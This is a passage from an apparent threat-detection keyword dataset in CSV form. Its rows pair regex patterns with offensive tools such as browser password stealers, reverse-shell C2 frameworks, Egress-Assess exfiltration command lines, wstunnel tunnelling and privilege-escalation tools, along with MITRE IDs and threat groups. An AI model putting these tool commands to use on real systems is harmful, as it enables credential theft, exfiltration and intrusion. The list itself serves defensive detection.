T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - 
FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","571" "* chrome masterkey *",".{0,1000}\schrome\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","572" "* chrome_decrypt.cpp *",".{0,1000}\schrome_decrypt\.cpp\s.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","573" "* chrome_decrypt.cpp*",".{0,1000}\schrome_decrypt\.cpp.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","574" "* chrome_decrypt.exe*",".{0,1000}\schrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","575" "* ChromeDump.ahk*",".{0,1000}\sChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - 
T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","576" "* chromepasswords.py*",".{0,1000}\schromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","577" "* chromium_based_browsers.py*",".{0,1000}\schromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","579" "* chromium_history.py*",".{0,1000}\schromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","580" "* chromium_logins.py*",".{0,1000}\schromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","581" "* 
cics-enum.nse*",".{0,1000}\scics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","582" "* cics-info.nse*",".{0,1000}\scics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","583" "* cics-user-brute.nse*",".{0,1000}\scics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","584" "* cics-user-enum.nse*",".{0,1000}\scics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","585" "* CIMplant.exe*",".{0,1000}\sCIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","586" "* citrix-brute-xml.nse*",".{0,1000}\scitrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","587" "* citrix-enum-apps.nse*",".{0,1000}\scitrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","588" "* citrix-enum-apps-xml.nse*",".{0,1000}\scitrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","589" "* citrix-enum-servers.nse*",".{0,1000}\scitrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","590" "* citrix-enum-servers-xml.nse*",".{0,1000}\scitrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","591" "* clamav-exec.nse*",".{0,1000}\sclamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","592" "* cleantracks.ps1",".{0,1000}\scleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","593" "* clear_logs.py*",".{0,1000}\sclear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - 
T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","594" "* --clear-obfscripts*",".{0,1000}\s\-\-clear\-obfscripts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","595" "* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*",".{0,1000}\s\-client\sftp\s\-ip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Datatype\sssn\s\-Size\s.{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","596" "* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*",".{0,1000}\s\-client\shttp\s\-ip\s.{0,1000}\s\-Datatype\scc\s\-Size\s.{0,1000}\s\-Port\s.{0,1000}\s\-Loop\s.{0,1000}\s\-Fast\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a 
tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","597" "* client --http-upgrade-path-prefix *wss*",".{0,1000}\sclient\s\-\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","598" "* -client icmp -ip * -Datatype ssn -Report -Verbose*",".{0,1000}\s\-client\sicmp\s\-ip\s.{0,1000}\s\-Datatype\sssn\s\-Report\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","599" "* client -L socks5://*",".{0,1000}\sclient\s\-L\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","600" "* client -L stdio://* 
ws:/*",".{0,1000}\sclient\s\-L\sstdio\:\/\/.{0,1000}\sws\:\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","601" "* client -L tcp://* wss://*",".{0,1000}\sclient\s\-L\stcp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","602" "* client -L 'tproxy+tcp://* -L 'tproxy+udp://*",".{0,1000}\sclient\s\-L\s\'tproxy\+tcp\:\/\/.{0,1000}\s\-L\s\'tproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","603" "* client -L 'udp://* wss://*",".{0,1000}\sclient\s\-L\s\'udp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","604" "* client -R 'tcp://[::]:*",".{0,1000}\sclient\s\-R\s\'tcp\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic 
over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","605" "* -client smb -ip * -Datatype *c:\*.* -Verbose*",".{0,1000}\s\-client\ssmb\s\-ip\s.{0,1000}\s\-Datatype\s.{0,1000}c\:\\.{0,1000}\..{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","606" "* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*",".{0,1000}\s\-Client\sSMTPOutlook\s\-IP\s.{0,1000}\s\-NoPing\s\-DataType\s.{0,1000}ssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","607" "* client.py -s http*:5000 --cert /*.pem*",".{0,1000}\sclient\.py\s\-s\shttp.{0,1000}\:5000\s\-\-cert\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","608" "* clipboard.ps1*",".{0,1000}\sclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","609" "* clock-skew.nse*",".{0,1000}\sclock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","610" "* Clone_Token /Process:* /Command:*",".{0,1000}\sClone_Token\s\/Process\:.{0,1000}\s\/Command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","611" "* Clones a security group while using an identical name and member list but can inject another user as well*",".{0,1000}\sClones\sa\ssecurity\sgroup\swhile\susing\san\sidentical\sname\sand\smember\slist\sbut\scan\sinject\sanother\suser\sas\swell.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","612" "* cloud_enum.py*",".{0,1000}\scloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","613" "* cloudsploit*",".{0,1000}\scloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","614" "* CLR-Injection_x64.bat*",".{0,1000}\sCLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","615" "* CLR-Injection_x86.bat*",".{0,1000}\sCLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","616" "* cmedb",".{0,1000}\scmedb","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","617" "* CMLoot.ps1*",".{0,1000}\sCMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","618" "* CMSFRottenPotato::*",".{0,1000}\sCMSFRottenPotato\:\:.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#content","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","619" "* cmstp_uac.ahk*",".{0,1000}\scmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","620" "* 
